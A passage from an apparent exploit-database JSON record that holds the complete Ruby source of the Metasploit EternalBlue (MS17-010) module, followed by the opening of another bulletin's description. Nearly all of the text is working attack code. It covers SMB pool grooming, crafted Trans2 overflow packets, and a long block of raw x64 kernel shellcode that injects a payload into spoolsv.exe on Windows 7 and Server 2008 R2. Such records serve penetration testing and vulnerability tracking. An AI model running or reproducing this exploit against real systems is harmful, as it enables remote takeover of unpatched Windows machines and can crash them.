'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64 ],\n\n 'os_patterns' => ['Server 2008 R2', 'Windows 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),\n OptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ),\n OptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ),\n OptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] ),\n OptBool.new( 'VerifyTarget', [ true, \"Check if remote OS matches exploit Target.\", true ] ),\n OptBool.new( 'VerifyArch', [ true, \"Check if remote architecture matches exploit Target.\", true ] ),\n OptString.new('SMBUser', [ false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [ false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']),\n ])\n end\n\n class EternalBlueError < StandardError\n end\n\n def check\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\n end\n\n def exploit\n begin\n for i in 1..datastore['MaxExploitAttempts']\n\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? and secs < 5\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n break\n else\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n end\n end\n\n rescue EternalBlueError => e\n print_error(\"#{e.message}\")\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status(\"Connecting to target for exploitation.\")\n client, tree, sock, os = smb1_anonymous_connect_ipc()\n print_good(\"Connection established for exploitation.\")\n\n if verify_target(os)\n print_good('Target OS selected valid for OS indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # Step 2: Create a large SMB1 buffer\n print_status(\"Sending all but last fragment of exploit packet\")\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status(\"Starting non-paged pool grooming\")\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good(\"Sending SMBv2 buffers\")\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\n fhs_sock.shutdown()\n\n print_status(\"Sending final SMBv2 buffers.\") # 6x\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\n\n fhf_sock.shutdown()\n\n print_status(\"Sending last fragment of exploit packet!\")\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status(\"Receiving response from exploit packet\")\n code, raw = smb1_get_response(sock)\n\n code_str = \"0x\" + code.to_i.to_s(16).upcase\n if code.nil?\n print_error(\"Did not receive a response from exploit packet\")\n elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status(\"Sending egg to corrupted connection.\")\n\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n print_status(\"Triggering free of corrupted buffer.\")\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = true\n\n if datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n # https://github.com/CoreSecurity/impacket/blob/master/examples/getArch.py\n # https://msdn.microsoft.com/en-us/library/cc243948.aspx#Appendix_A_53\n def verify_arch\n ret = false\n\n return true if !datastore['VerifyArch']\n\n pkt = Rex::Proto::DCERPC::Packet.make_bind(\n # Abstract Syntax: EPMv4 V3.0\n 'e1af8308-5d1f-11c9-91a4-08002b14a0fa', '3.0',\n # Transfer Syntax[1]: 64bit NDR V1\n '71710533-beba-4937-8319-b5dbef9ccc36', '1.0'\n ).first\n\n begin\n sock = connect(false,\n 'RHOST' => rhost,\n 'RPORT' => 135\n )\n rescue Rex::ConnectionError => e\n print_error(e.to_s)\n return false\n end\n\n sock.put(pkt)\n\n begin\n res = sock.get_once(60)\n rescue EOFError\n print_error('DCE/RPC socket returned EOFError')\n return false\n end\n\n disconnect(sock)\n\n begin\n resp = Rex::Proto::DCERPC::Response.new(res)\n rescue Rex::Proto::DCERPC::Exceptions::InvalidPacket => e\n print_error(e.to_s)\n return false\n end\n\n case target_arch.first\n when ARCH_X64\n # Ack result: Acceptance (0)\n if resp.ack_result.first == 0\n ret = true\n end\n when ARCH_X86\n # Ack result: Provider rejection (2)\n # Ack reason: Proposed transfer syntaxes not supported (2)\n if resp.ack_result.first == 2 && resp.ack_reason.first == 2\n ret = true\n end\n end\n\n ret\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length.to_s} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do | chunk |\n hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, \"0\") }.join(\" \")\n\n format = \"0x%08x %-47s %-16s\" % [(count * 16), hexdump, chunk]\n print_status(format)\n count += 1\n end\n end\n\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |groom_id|\n gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code.to_s}\"\n end\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n vprint_status(\"Sending NT Trans Request packet\")\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status(\"Sending malformed Trans2 packets\")\n sock.put(trans2_pkt_nulled)\n\n sock.get_once\n\n client.echo(count:1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n client.negotiate\n\n pkt = \"\"\n\n if start\n vprint_status(\"Sending start free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status(\"Sending end free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? or raw.empty?\n end\n\n return nil unless raw\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = \"\"\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = \"\"\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\n pkt << \"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0,packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status(\"Making :eb_trans2_exploit packet\")\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 4\n\n pkt << \"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status(\"Making :eb_trans2_zero packet\")\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status(\"Making :eb_trans2_buffer packet\")\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + ( \"\\x00\" * 973 )\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n packet.parameter_block.max_buffer_size = 4356\n packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\n sc = make_kernel_shellcode\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n sc\n end\n\n def make_kernel_shellcode\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n #\"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" +\n \"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" +\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" +\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" +\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" +\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" +\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" +\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" +\n \"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" +\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" +\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" +\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" +\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" +\n \"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" +\n \"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" +\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" +\n \"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" +\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" +\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" +\n \"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" +\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" +\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" +\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" +\n \"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" +\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" +\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" +\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" +\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\" +\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" +\n \"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" +\n \"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" +\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" +\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" +\n \"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" +\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" +\n \"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" +\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" +\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" +\n \"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" +\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" +\n \"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" +\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" +\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" +\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" +\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" +\n \"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" +\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" +\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" +\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" +\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" +\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" +\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" +\n \"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" +\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" +\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" +\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" +\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" +\n \"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" +\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" +\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" +\n \"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" +\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" +\n \"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" +\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\"#\\x01\\x00\\xC3\"\n\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @rturn [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet,tree_id,user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user hs not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. If the user hs not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 340}, "differentElements": ["published", "modified", "sourceData"], "edition": 2, "lastseen": "2017-07-24T19:27:03"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or 